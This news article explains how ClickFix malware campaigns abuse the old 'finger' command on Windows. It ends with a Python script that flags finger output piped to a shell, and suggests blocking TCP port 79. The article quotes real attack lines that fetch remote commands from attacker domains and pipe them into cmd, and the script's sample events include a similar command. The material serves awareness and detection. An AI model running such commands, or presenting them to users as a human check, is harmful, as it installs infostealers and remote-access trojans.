Decades-Old 'Finger' Protocol Exploited in ClickFix Malware Attacks: How to Protect Yourself (2026)

The classic 'Finger' command, once a harmless tool, has been weaponized in a new wave of malware attacks.

A blast from the past, with a malicious twist:

The 'Finger' protocol, a relic from the early days of computing, is experiencing a resurgence, but not in a positive light. Threat actors are exploiting this decades-old command to launch ClickFix attacks on Windows devices, marking a concerning evolution in cybercrime. In the digital realm, even the most innocent-looking tools can be twisted for nefarious purposes.

A brief history of 'Finger':

Back in the day, the 'finger' command was a simple way to gather information about users on Unix and Linux systems, later adopted by Windows. It provided basic user details, such as login name, home directory, and last seen activity. However, its popularity has faded over the years, leaving it a rarely used relic.

But here's where it gets controversial—this isn't the first time 'Finger' has been misused. In 2020, researchers discovered that it was being abused as a LOLBIN to stealthily download malware, highlighting the command's potential as a backdoor for malicious activities.

The recent attacks:

Last month, a cybersecurity researcher, MalwareHunterTeam, revealed a batch file that, when executed, used the 'finger root@finger.nateams[.]com' command to fetch and run remote commands. This campaign has evolved, with attackers now impersonating Captcha prompts, tricking users into running Windows commands. A Reddit user fell victim, sharing their experience of entering 'cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER' into their command prompt.

This attack leverages the Finger protocol to deliver remote scripts. By piping the output through cmd.exe, the attackers execute commands that download and extract malicious files, including a Python package. The purpose of this package remains unclear, but it's suspected to be an infostealer.

A more sophisticated variant:

Another campaign, discovered by MalwareHunterTeam, uses a similar tactic with the command 'finger Kove2@api.metrics-strange[.]com | cmd'. This attack is more evolved: it searches for common malware analysis tools and exits if any are found. If the coast is clear, it downloads and extracts a zip archive containing the NetSupport Manager RAT package and sets up a scheduled task to launch the malware when the user logs in.

Protecting against 'Finger' abuse:

As these ClickFix attacks continue to ensnare victims, awareness is crucial. Defenders can block these attacks by restricting outgoing traffic to TCP port 79, which is used to connect to the Finger protocol daemon.
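Alongside the port 79 block, process-creation logs can be screened for the command shape described above: finger queried against a remote host, with its output piped into a shell. The sketch below is an added example, not code from the original article; the event fields, hostnames and verdict labels are constructed for illustration.

```python
import re

# finger[.exe] [-l] [user]@host  -> a remote Finger query (outbound TCP/79).
FINGER_REMOTE = re.compile(
    r'(?<![\w.-])finger(?:\.exe)?"?\s+(?:-l\s+)?[^\s|"&@]*@(?P<host>[\w.-]+)', re.I)
# The query's output handed straight to a command interpreter.
PIPE_TO_SHELL = re.compile(r'\s*\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b', re.I)

def classify(cmdline):
    """Return (verdict, remote_host) for a command line, or None if it is not a match."""
    m = FINGER_REMOTE.search(cmdline)
    if m is None:
        return None  # no finger call, or a local-only lookup without @host
    piped = PIPE_TO_SHELL.match(cmdline, m.end())
    verdict = "piped-to-shell" if piped else "remote-query"
    return verdict, m.group("host").lower()

def triage(events):
    """Reduce process-creation events to the ones an analyst should review."""
    hits = []
    for ev in events:
        result = classify(ev["cmdline"])
        if result:
            hits.append({"computer": ev["computer"],
                         "verdict": result[0], "target": result[1]})
    return hits

# Constructed sample events (field names are assumptions, hosts are placeholders).
SAMPLE_EVENTS = [
    {"computer": "WS-01", "cmdline":
     'cmd /c start "" /min cmd /c "finger user1@finger.example.test | cmd" && echo Verify'},
    {"computer": "WS-02", "cmdline": r'C:\Windows\System32\finger.exe -l admin@10.0.0.5'},
    {"computer": "WS-03", "cmdline": 'finger localuser'},
    {"computer": "WS-04", "cmdline": 'python fingerprint_check.py a@example.test | cmd'},
    {"computer": "WS-05", "cmdline": 'type notes.txt | cmd'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Any "piped-to-shell" hit warrants immediate review; a bare "remote-query" is rare enough on most Windows fleets to be worth a look as well.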



Author: Nathanial Hackett
